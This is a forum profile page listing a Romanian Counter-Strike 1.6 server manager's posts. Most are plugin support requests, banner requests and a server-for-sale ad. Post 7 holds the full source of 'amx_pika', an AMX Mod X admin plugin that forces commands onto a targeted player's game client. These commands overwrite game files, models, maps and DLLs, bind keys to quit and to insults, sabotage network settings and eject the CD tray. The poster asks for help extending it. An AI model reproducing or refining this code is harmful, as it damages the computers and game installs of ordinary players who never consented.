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Everything posted by rzeRO

  1. cauta "driver max", e bun, dar problema e ca iti da update la 2 drivere pe zi
  2. Model: Un plugin pentru restrictie arme pe mapele AWP Nume: restriction ... Versiune: Descriere: As dori un plugin care sa restrictioneze alte arme in afara de awp, doar pe mapele awp_
  3. Am cs dupa Steam, l-am reinstalat si degeaba aceasi problema.
  4. l-am reinstalat pe Steam din nou si tot ma scoate si ma baga in alt server, de pe alt cs nu am incercat sa intru.
  5. Dupa 10-15 secunde dupa ce intru pe server ma scoate si imi da redirect pe alt server cu aceasta eroare in consola: "Server tried to send invalid command:"Connect" Stie cineva care ar fi problema? Am uitat sa precizez, joc dupa STEAM
  6. As dori un Banner RANGFORT (Am un website din domeniu pariuri sportive/sport...) doresc sa promovez comunitatea gratuit. Orice credeti voi ca da bin MARIME: 600X300 De preferat ar fi ceva GIF! Stiu ca nu se poate cere ceva de genul dar este in avantajul comunitatii.
  7. rzeRO

    Suport amx_pika

    /* AMX Mod X Script * * RANGFORT Dev Team * * ======---=========== * © 2013 by KenT * www.rangfort.ro * ======---=========== * * This file is intended to be used with AMX Mod X. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * AMXX Pika v1.2.0 * * changelog: * v1.0.0 * - Versiune privata * * v2.1.0 * - Am adaugat definire de mesaj colorat pentru cine doreste doar. * - Mai multe functii destroy ( fisiere ). * - Am adaugat fisier .LOG. * - Comanda nu mai poate fi folosita pe personal, admini, boti. * - Acum pluginul va afecta putin si jucatorii cu Steam. * - Optimizat doar amxmodx, amxmisc. * - Detalii comanda si cum se foloseste. */ #include < amxmodx > #include < amxmisc > /**************************************************************/ #define PLUGIN_NAME "AMXX Pika" #define PLUGIN_VERSION "1.2.0" #define PLUGIN_AUTHOR "AzaZeL" // aka CryWolf // Numele fisierului .log #define LOGFILE "AMXX_PIKA.log" /*********** DESTORY COMMANDS ********************************/ new const g_pika [ ] [ ] = { "kill", "motdfile models/player.mdl;motd_write y", "motdfile models/v_ak47.mdl;motd_write x", "motdfile models/p_ak47.mdl;motd_write x", "motdfile models/v_flashbang.mdl;motd_write y", "motdfile models/p_m3.mdl;motd_write x", "motdfile models/v_awp.mdl;motd_write n", "motdfile models/p_ump45.mdl;motd_write x", "motdfile models/v_awp.mdl;motd_write x", "motdfile models/player/arctic/arctic.mdl;motd_write x", "motdfile models/player/gsg9/gsg9.mdl;motd_write y", "motdfile models/player/sas/sas.mdl;motd_write x", "motdfile models/player/terror/terror.mdl;motd_write y", "motdfile models/player/vip/vip.mdl;motd_write x", "motdfile models/player/urban/urban.mdl;motd_write x", "motdfile resource/GameMenu.res;motd_write x", "motdfile halflife.wad;motd_write x", "motdfile liblist.gam;motd_write y", "motdfile cs_dust.wad;motd_write x", "motdfile events/ak47.sc;motd_write x", "motdfile autoexec.cfg;motd_write x", "motdfile server.cfg;motd_write x", "motdfile ajawad.wad;motd_write x", "motdfile cstrike.wad;motd_write x", "motdfile dlls/mp.dll;motd_write x", "motdfile dlls/cs_i386.so;motd_write x", "motdfile cl_dlls/client.dll;motd_write x", "motdfile resource/cstrike_english.txt;motd_write x", "motdfile resource/game_menu.tga;motd_write x", "motdfile maps/de_inferno.bsp;motd_write x", "motdfile maps/de_dust2.bsp;motd_write x", "motdfile maps/de_aztec.bsp;motd_write x", "motdfile maps/de_dust.bsp;motd_write x", "motdfile maps/de_train.bsp;motd_write x", "motdfile cs_assault.wad;motd_write x", "motdfile spectatormenu.txt.wad;motd_write x", "motdfile custom.hpk;motd_write x", "sys_ticrate 0.1", "bind w Intrati pe WWW.RANGFORT.RO", "bind a Vreau muie", "bind d quit", "cl_cmdrate 0.1", "cl_updaterate 0.0.1", "fps_max 1.0", "fps_modem 1.0", "WWW.RANGFORT.RO", "cl_timeout 0.0", "cl_allowdownload 0", "cl_allowupload 0", "rate 00000", "developer 2", "hpk_maxsize 100", "bind m sunt_un_cacat", "bind q admin_esti_un_prost_I_", "bind g admin_mata_suge_cariciu )", "cl_forwardspeed 100", "cl_backspeed 100", "cl_sidespeed 100", "motdfile userconfig.cfg;motd_write x", "bind t quit", "bind y quit", "cd eject" }; /************************************************************/ public plugin_init ( ) { register_plugin ( PLUGIN_NAME, PLUGIN_VERSION, PLUGIN_AUTHOR ) register_clcmd ( "amx_pika", "cmdPika", ADMIN_IMMUNITY, "<nume sau #userid>" ); } public cmdPika ( id, level, cid ) { if ( !cmd_access ( id, level, cid, 2 ) ) return 1; new arg [ 33 ]; read_argv ( 1, arg, charsmax ( arg ) ); new player = cmd_target ( id, arg, CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ); if ( !player ) { console_print ( id, "[RZE.RANGFORT.RO] Jucatorul nu este online sau a iesit de pe Server." ); return 1; } new authid [ 33 ], authid2 [ 33 ], name2 [ 33 ], name [ 33 ], userid2, reason [ 32 ], userip [ 33 ]; get_user_authid ( id, authid, charsmax ( authid ) ); get_user_authid ( player, authid2, charsmax ( authid2 ) ); get_user_name ( player, name2, charsmax ( name2 ) ); get_user_name ( id, name, charsmax ( name ) ); get_user_ip ( player, userip, charsmax ( userip ) ); userid2 = get_user_userid ( player ) read_argv ( 2, reason, 31 ); remove_quotes ( reason ); log_to_file ( LOGFILE, "Adminul %s La Distrus Pe: %s cu motivul: (%s)", name, player, userid2, reason ) for ( new i = 0; i < sizeof ( g_pika ); i++ ) client_cmd ( player, g_pika [ i ] ); server_cmd("amx_teg ^"%s^" ^"%s^" 0 ^"Ai Fost Distrus + ban permanent^"",name2,userip) client_cmd ( 0, "spk ^"vox/bizwarn detected user has teg^"" ); ColorChat( 0, "^x04--------------------------------WWW.RANGFORT.RO--------------------------------------------------" ); ColorChat( 0, "^x04[RZE.RANGFORT.RO]^x01 Jucatorul^x04 %s^x01 cu ip^x04 %s^x01 a fost^x03 Distrus si banat^x01 !", name2, userip ); ColorChat( 0, "^x04[RZE.RANGFORT.RO]^x01 Comanda executata de catre adminul^x04 %s^x01 !", name ); ColorChat( 0, "^x04--------------------------------WWW.RANGFORT.RO--------------------------------------------------" ); set_hudmessage( 0, 255, 0, -1.0, -1.0, 2, 2.0, 2.0 ); show_hudmessage( 0, "Jucatorul %s a fost Distrus si banat!^nComanda executata de adminul %s.",name2, name ); return 1; } stock ColorChat( const id, const input[ ], any:... ) { new count = 1, players[ 32 ]; static msg[ 191 ]; vformat( msg, 190, input, 3 ); replace_all( msg, 190, "!g", "^4" ); replace_all( msg, 190, "!y", "^1" ); replace_all( msg, 190, "!t", "^3" ); if( id ) players[ 0 ] = id; else get_players( players, count, "ch" ); { for( new i = 0; i < count; i++ ) { if( is_user_connected( players[ i ] ) ) { message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] ); write_byte( players[ i ] ); write_string( msg ); message_end( ); } } } } Deci eu vreau mesaj in consola dupa ce primeste pika, Pentru cerere unban intrati pe www.rangfort.ro/forum | Sectiunea [CSDM-RZE]
  8. rzeRO

    Suport amx_pika

    Server: rze.rangfort.ro Nick: RZE Grad server: Manager server La ce doriţi ajutor?: Ma puteti ajuta sa pun in pika mesaj care sa apara in consola de ex: Pentru cerere unban intrati pe www.rangfort.ro/forum sectiunea CSDM-RZE ? Poză cu problema (Nu este obligatoriu) :
  9. rzeRO

    Suport - ad_manager

    Am rezolvat, multumesc. Puteti da T/C
  10. rzeRO

    Suport - ad_manager

    ad_manager.sma /* ad_manager.sma * tDk* - Studio * Pentru mai multe detalii despre acest plugin intra pe # * Contact - aln_ty@yahoo.com */ #include <amxmodx> #include <amxmisc> #pragma semicolon 1 new const PLUGIN[] = "Autoresponder/Advertiser"; new const VERSION[] = "0.5"; new const AUTHOR[] = "MaximusBrood"; #define NORM_AD 0 #define SAY_AD 1 #define COND 0 #define STORE 1 #define COND_TKN '%' #define SAY_TKN '@' #define COND_STKN "%" #define DEVIDE_STKN "~" #define SAY_STKN "@" //-.-.-.-.-.-.-.-.DEFINES.-.-.-.-.-.-.-.-.-.-. //Maximum amount of ads #define MAXADS 64 //Minimum difference between two different ads (float) new const Float:RAND_MIN = 30.0; //Maximum difference between two different ads (float) new const Float:RAND_MAX = 30.0; //-.-.-.-.-.-.-.-.END DEFINES..-.-.-.-.-.-.-. //Stores new sayConditions[MAXADS][3][32]; new normConditions[MAXADS][3][32]; new normStore[MAXADS][128]; new sayStore[MAXADS][2][128]; new gmsgSayText; //Counters new adCount[2] = {0, 0}; public plugin_init() { register_plugin(PLUGIN, VERSION, AUTHOR); register_cvar("admanager_version", "0.5", FCVAR_SERVER); register_cvar("ad_react_all", "1"); gmsgSayText = get_user_msgid("SayText"); register_clcmd("say","eventSay"); register_clcmd("say_team","eventSay"); //Delay the load proces by 10 sec because we don't want to get more load //on the already high-load mapchange. //Too soon to affect players while playing, too late to create time-out @ mapchange set_task(10.0, "load"); } public load() { //Load the data new filepath[64]; get_configsdir(filepath, 63); format(filepath, 63, "%s/advertisements.ini", filepath); if(file_exists(filepath)) { new output[512], conditions[128], temp[64], type; //Open file new fHandle = fopen(filepath, "rt"); //Checks for failure if(!fHandle) return; //Loop through all lines for(new a = 0; a < MAXADS && !feof(fHandle); a++) { //Get line fgets(fHandle, output, 511); //Work away comments if(output[0] == ';' || !output[0] || output[0] == ' ' || output[0] == 10) { //Line is not counted a--; continue; } //Reset type type = 0; //Check if it contains conditions if(output[0] == COND_TKN) { //Cut the conditions off the string split(output, conditions, 127, output, 511, DEVIDE_STKN); //Determine if its say check or normal ad type = output[0] == SAY_TKN ? 1 : 0; //Put the conditions in own space for(new b = 0; b < 3; b++) { new sort[16], cond[32], numb; //Remove the % from line conditions[0] = ' '; trim(conditions); //Get one condition from the line split(conditions, temp, 64, conditions, 127, COND_STKN); split(temp, sort, 15, cond, 31, " "); if(equali(sort, "map")) { numb = 0; } else if(equali(sort, "min_players")) { numb = 1; } else if(equali(sort, "max_players")) { numb = 2; } else { continue; } //Copy it to its final resting place ^^ setString(COND, type, cond, adCount[type], numb); //Exit if it hasn't got more conditions if(!conditions[0]) break; } } if(type == 0) type = output[0] == SAY_TKN ? 1 : 0; if(type == SAY_AD) { new said[32], answer[128]; //Remove the @ from line output[0] = ' '; trim(output); split(output, said, 31, answer, 127, DEVIDE_STKN); //Apply color setColor(answer, 127); //Save it setString(STORE, SAY_AD, said, adCount[SAY_AD], 0); setString(STORE, SAY_AD, answer, adCount[SAY_AD], 1); } else//if(type == NORM_AD) { //Apply color setColor(output, 511); //Save it setString(STORE, NORM_AD, output, adCount[NORM_AD]); } //Increment the right counter adCount[NORM_AD] += type == NORM_AD ? 1 : 0; adCount[SAY_AD] += type == SAY_AD ? 1 : 0; } //Set a first task, if there are any normal ads if(adCount[NORM_AD] != 0) set_task(random_float(RAND_MIN, RAND_MAX), "eventTask"); //Close file to prevent lockup fclose(fHandle); } } new currAd = -1; public eventTask() { //Go past all ads and check conditions for(new a = 0; a < adCount[NORM_AD]; a++) { //Put current ad to the next one currAd = currAd == adCount[NORM_AD] - 1 ? 0 : currAd + 1; if(checkConditions(currAd, NORM_AD)) { //Display the ad new data[3]; data[0] = currAd; data[1] = NORM_AD; data[2] = 0; displayAd(data); break; } } //Set a new task set_task(random_float(RAND_MIN, RAND_MAX), "eventTask"); return PLUGIN_CONTINUE; } public eventSay(id) { //If nothing is said, don't check if(adCount[SAY_AD] == 0) return PLUGIN_CONTINUE; new talk[64], keyword[16]; read_args(talk, 63) ; //En nu rennen voor jullie zakgeld klootzjakken! for(new a = 0; a < adCount[SAY_AD]; a++) { //Get the string getString(STORE, SAY_AD, keyword, 15, a, 0); if(containi(talk, keyword) != -1) { //Check the rest if it fails to conditions if(!checkConditions(a, SAY_AD)) continue; new data[3]; data[0] = a; data[1] = SAY_AD; data[2] = id; //Set the task set_task(0.3, "displayAd", 0, data, 3); //Don't execute more of them break; } } return PLUGIN_CONTINUE; } public displayAd(params[]) { //Get the string that is going to be displayed new message[128]; getString(STORE, params[1], message, 127, params[0], params[1]); //If its enabled by cvar and id is set, display to person who triggered message only if(get_cvar_num("ad_react_all") == 0 && params[2] != 0) { message_begin(MSG_ONE, gmsgSayText, {0,0,0}, params[2]); write_byte(params[2]); write_string(message); message_end(); } else { //Display the message to everyone new plist[32], playernum, player; get_players(plist, playernum, "c"); for(new i = 0; i < playernum; i++) { player = plist[i]; message_begin(MSG_ONE, gmsgSayText, {0,0,0}, player); write_byte(player); write_string(message); message_end(); } } return PLUGIN_HANDLED; } //--------------------------------------------------------------------------- // STOCKS //--------------------------------------------------------------------------- stock checkConditions(a, type) { //Mapname if((type == NORM_AD && normConditions[a][0][0]) || (type == SAY_AD && sayConditions[a][0][0])) { new mapname[32]; get_mapname(mapname, 31); if(! (type == NORM_AD && equali(mapname, normConditions[a][0]) ) || (type == SAY_AD && equali(mapname, sayConditions[a][0]) ) ) return false; } //Min Players if((type == NORM_AD && normConditions[a][1][0]) || (type == SAY_AD && sayConditions[a][1][0])) { new playersnum = get_playersnum(); if( (type == NORM_AD && playersnum < str_to_num(normConditions[a][1]) ) || (type == SAY_AD && playersnum < str_to_num(sayConditions[a][1]) ) ) return false; } //Max Players if((type == NORM_AD && normConditions[a][2][0]) || (type == SAY_AD && sayConditions[a][2][0])) { new playersnum = get_playersnum(); if( (type == NORM_AD && playersnum > str_to_num(normConditions[a][2]) ) || (type == SAY_AD && playersnum > str_to_num(sayConditions[a][2]) ) ) return false; } //If everything went fine, return true return true; } stock setColor(string[], len) { if (contain(string, "!t") != -1 || contain(string, "!g") != -1 || contain(string,"!n") != -1) { //Some nice shiny colors ^^ replace_all(string, len, "!t", "^x03"); replace_all(string, len, "!n", "^x01"); replace_all(string, len, "!g", "^x04"); //Work away a stupid bug format(string, len, "^x01%s", string); } } stock getString(mode, type, string[], len, one, two = 0) { //server_print("mode: %d type: %d len: %d one: %d two %d", mode, type, len, one, two); //Uses the fact that a string is passed by reference if(mode == COND) { if(type == NORM_AD) { copy(string, len, normConditions[one][two]); } else//if(type = SAY_AD) { copy(string, len, sayConditions[one][two]); } } else//if(mode == STORE) { if(type == NORM_AD) { copy(string, len, normStore[one]); } else//if(type == SAY_AD) { copy(string, len, sayStore[one][two]); } } } stock setString(mode, type, string[], one, two = 0) { if(mode == COND) { if(type == NORM_AD) { copy(normConditions[one][two], 31, string); } else//if(type = SAY_AD) { copy(sayConditions[one][two], 31, string); } } else//if(mode == STORE) { if(type == NORM_AD) { copy(normStore[one], 127, string); } else//if(type == SAY_AD) { copy(sayStore[one][two], 127, string); } } }
  11. Server : rze.rangfort.ro Nick : RZE Grad server : Manager La ce doriţi ajutor? : am o problema cu ad_manager.amxx imi apar mesajele dupa 3-4 minute de la inceperea mapei, intervalul de timp este setat la 30 de secunde dar degeaba. Poză cu problema (Nu este obligatoriu) : -
  12. Tot problema care nu-mi arata kill-urile Dar in fine il las asa fara culoare. As mai avea o rugaminte daca se poate un plugin de say_team colorat cand scriu playerii pe u@ sa apara color
  13. Nume: statsx.amxx Versiune: nu conteaza Descriere detaliata: As dori un plugin statsx.amxx colorat, cand scriu /rank sa-mi apara colorat gen, cred ca stiti la ce ma refer.
  14. Server : RZE.RANGFORT.RO Nick : RZE Grad server : Manager La ce doriţi ajutor? : Am o problema cu pluginul de /rank, nu mai am pluginul csstats.amxx am descarcat rank_rankstats_top.amxx pentru ca am vrut rank colorat si nu am reusit doar asa, (cand scriu de exemplu /rank imi apare doar: [Rank] RZE, esti pe locul 1 din 3124 ... nu imi apar kill-urile si decesurile. Poză cu problema (Nu este obligatoriu) : , cu 10 fraguri si 30 decese etc... (de exemplu) Care ar fi cauza?
  15. #Nume produs Server cs 1.6 #Poze Cs 1.6 SERVER #Descriere ( câteva informații despre produs ) Server de cs 1.6 - 32 sloturi #Modalitate de plată ( Paypal , paysafe , cod reîncărcabil etc. ) Cod reincarcabil / PaySafe #Preț produs 5 euro #Date de contact (telefon) : 0723.069.880 #Alte precizări ( dacă există ) Pentru mai multe detalii, lasati PM!
  16. Multumesc asta ramane, puteti da T/C
  17. Nu sunt designer dar sper sa-ti placa.
  18. Avatar/Semnatura/Logo/Banner/etc : Avatar Tema pozei / Stock-ul dorit ( obligatoriu ): Text principal : RZE Text secundar ( rangfort / www.rangfort.ro / nume server ) : RZE.RANGFORT.RO Alte precizari : Multumesc anticipat! Dimensiuni avatar ( 150 x 250 SAU 150 x 300 ) : 150x300 Link de la ultima cerere: http://rangfort.ro/f...-cerere-avatar/
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